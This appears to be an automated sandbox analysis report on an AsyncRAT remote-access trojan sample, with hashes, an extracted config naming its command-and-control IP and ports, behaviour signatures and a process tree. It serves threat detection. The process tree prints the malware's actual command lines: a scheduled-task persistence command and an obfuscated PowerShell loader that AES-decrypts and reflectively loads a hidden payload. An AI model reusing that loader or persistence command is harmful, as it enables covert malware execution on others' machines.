asyncrat | b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7

General

Target

iFYEJ.exe
Size

2.5MB
MD5

acfe53c70928d44f9cf498495145ec84
SHA1

2a12b327d4e5628904cc25c5f134732d6265e662
SHA256

b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7
SHA512

345143bcc9895282d2843efee182eb07bc0d0179c0c1e6ffcdd7ff9f1d44c252ffccb1b56c2b48c70b554f3427f6a1c23a6ea6b1c9e76edcbe655e88e247741c
SSDEEP

49152:Gg8nNv+SzYW4ZOUB5hempuE8OOTRmgysj8k4:Gg8h14

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

89.117.21.143:6606

89.117.21.143:7707

89.117.21.143:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 7 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/820-61-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-62-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-63-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-64-0x000000000040C71E-mapping.dmp	asyncrat
behavioral1/memory/820-66-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-68-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-74-0x00000000005F0000-0x0000000000612000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

Processes:

vmtuci.bat.exe

pid process

912 vmtuci.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1748 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

iFYEJ.exe

description pid process target process

PID 1636 set thread context of 820 1636 iFYEJ.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1496 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1556 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exevmtuci.bat.exe

pid process

1224 powershell.exe
1224 powershell.exe
1224 powershell.exe
912 vmtuci.bat.exe

pid	process
912	vmtuci.bat.exe

pid	process
1748	cmd.exe

description	pid	process	target process
PID 1636 set thread context of 820	1636	iFYEJ.exe	vbc.exe

pid	process
1496	schtasks.exe

pid	process
1556	timeout.exe

pid	process
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
912	vmtuci.bat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

iFYEJ.exevbc.exepowershell.exevmtuci.bat.exe

description	pid	process
Token: SeDebugPrivilege	1636	iFYEJ.exe
Token: SeDebugPrivilege	820	vbc.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	912	vmtuci.bat.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

iFYEJ.execmd.exevbc.execmd.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	cmd.exe
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	cmd.exe
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	cmd.exe
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	cmd.exe
PID 620 wrote to memory of 1496	620	cmd.exe	schtasks.exe
PID 620 wrote to memory of 1496	620	cmd.exe	schtasks.exe
PID 620 wrote to memory of 1496	620	cmd.exe	schtasks.exe
PID 620 wrote to memory of 1496	620	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	vbc.exe
PID 820 wrote to memory of 1560	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 1560	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 1560	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 1560	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 936	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 936	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 936	820	vbc.exe	cmd.exe
PID 820 wrote to memory of 936	820	vbc.exe	cmd.exe
PID 1560 wrote to memory of 1224	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1224	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1224	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1224	1560	cmd.exe	powershell.exe
PID 936 wrote to memory of 1556	936	cmd.exe	timeout.exe
PID 936 wrote to memory of 1556	936	cmd.exe	timeout.exe
PID 936 wrote to memory of 1556	936	cmd.exe	timeout.exe
PID 936 wrote to memory of 1556	936	cmd.exe	timeout.exe
PID 1224 wrote to memory of 1748	1224	powershell.exe	cmd.exe
PID 1224 wrote to memory of 1748	1224	powershell.exe	cmd.exe
PID 1224 wrote to memory of 1748	1224	powershell.exe	cmd.exe
PID 1224 wrote to memory of 1748	1224	powershell.exe	cmd.exe
PID 1748 wrote to memory of 912	1748	cmd.exe	vmtuci.bat.exe
PID 1748 wrote to memory of 912	1748	cmd.exe	vmtuci.bat.exe
PID 1748 wrote to memory of 912	1748	cmd.exe	vmtuci.bat.exe
PID 1748 wrote to memory of 912	1748	cmd.exe	vmtuci.bat.exe

C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe
"C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:620

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
3⤵
- Creates scheduled task(s)
PID:1496

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\vmtuci.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\vmtuci.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vmtuci.bat" "
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Local\Temp\vmtuci.bat.exe
"vmtuci.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $jwaHO = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\vmtuci.bat').Split([Environment]::NewLine);foreach ($eKGSM in $jwaHO) { if ($eKGSM.StartsWith(':: ')) { $qdqSr = $eKGSM.Substring(3); break; }; };$QQCgF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qdqSr);$AmjNH = New-Object System.Security.Cryptography.AesManaged;$AmjNH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AmjNH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AmjNH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h2/C7kSVdBKzfHpNijDOerbgICwzq39ikAsdwwbv4us=');$AmjNH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7g2z5diB2473fR8+2MRCTQ==');$wgvzs = $AmjNH.CreateDecryptor();$QQCgF = $wgvzs.TransformFinalBlock($QQCgF, 0, $QQCgF.Length);$wgvzs.Dispose();$AmjNH.Dispose();$tkbaD = New-Object System.IO.MemoryStream(, $QQCgF);$TZnYn = New-Object System.IO.MemoryStream;$FtxeR = New-Object System.IO.Compression.GZipStream($tkbaD, [IO.Compression.CompressionMode]::Decompress);$FtxeR.CopyTo($TZnYn);$FtxeR.Dispose();$tkbaD.Dispose();$TZnYn.Dispose();$QQCgF = $TZnYn.ToArray();$IqKDG = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($QQCgF);$vjmLt = $IqKDG.EntryPoint;$vjmLt.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp9403.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\SysWOW64\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:1556

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp9403.tmp.bat
Filesize
167B

MD5
f4a02f9101ebc4ff6d1396019cc061e3

SHA1
0f359e60eba8c0b7e9973589a34570df881be507

SHA256
0bb30e5b6ea6065e7616ba540ff70f0f37ebfef925409fc04f60181ae915fefc

SHA512
521d3e2e7d54b5f4a7816877a59c149db78303442433de26e04268fd91112ba5e6b103d06efa4a03ad3490c3b6fff6fd1393da54f02c28d531de348f78b7f69b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vmtuci.bat
Filesize
325KB

MD5
0e901cd4460579b61abece2b88f54035

SHA1
e776e751a2257cc6d56b85dd7f3c5c1a64bfc604

SHA256
59fbf83208e965445268cc973a63516dba60c68eced0d3cd8ed2e9499951dc32

SHA512
f15cbd6d506142f0c1f3f5271881c4e083d08976f34d18b72d4967efe33f4479acf3d3f3b5d9ea537f110be407a72c968204494428e1f0626ffe10bdc3df4a45

Download Submit
C:\Users\Admin\AppData\Local\Temp\vmtuci.bat.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Local\Temp\vmtuci.bat.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/620-55-0x0000000000000000-mapping.dmp

Download
memory/820-63-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-58-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-62-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-61-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-64-0x000000000040C71E-mapping.dmp

Download
memory/820-66-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-68-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-69-0x00000000761F1000-0x00000000761F3000-memory.dmp

Filesize
8KB

Download
memory/820-70-0x0000000005770000-0x00000000057EE000-memory.dmp

Filesize
504KB

Download
memory/820-71-0x0000000000510000-0x000000000051A000-memory.dmp

Filesize
40KB

Download
memory/820-72-0x0000000005C30000-0x0000000005CC0000-memory.dmp

Filesize
576KB

Download
memory/820-73-0x0000000005F70000-0x0000000005FD0000-memory.dmp

Filesize
384KB

Download
memory/820-74-0x00000000005F0000-0x0000000000612000-memory.dmp

Filesize
136KB

Download
memory/820-59-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/912-86-0x0000000000000000-mapping.dmp

Download
memory/912-90-0x0000000074430000-0x00000000749DB000-memory.dmp

Filesize
5.7MB

Download
memory/912-89-0x0000000074430000-0x00000000749DB000-memory.dmp

Filesize
5.7MB

Download
memory/936-76-0x0000000000000000-mapping.dmp

Download
memory/1224-78-0x0000000000000000-mapping.dmp

Download
memory/1224-81-0x0000000073E80000-0x000000007442B000-memory.dmp

Filesize
5.7MB

Download
memory/1224-84-0x0000000073E80000-0x000000007442B000-memory.dmp

Filesize
5.7MB

Download
memory/1496-56-0x0000000000000000-mapping.dmp

Download
memory/1556-79-0x0000000000000000-mapping.dmp

Download
memory/1560-75-0x0000000000000000-mapping.dmp

Download
memory/1636-57-0x00000000007A0000-0x00000000007C6000-memory.dmp

Filesize
152KB

Download
memory/1636-54-0x0000000000E60000-0x00000000010E8000-memory.dmp

Filesize
2.5MB

Download
memory/1748-83-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads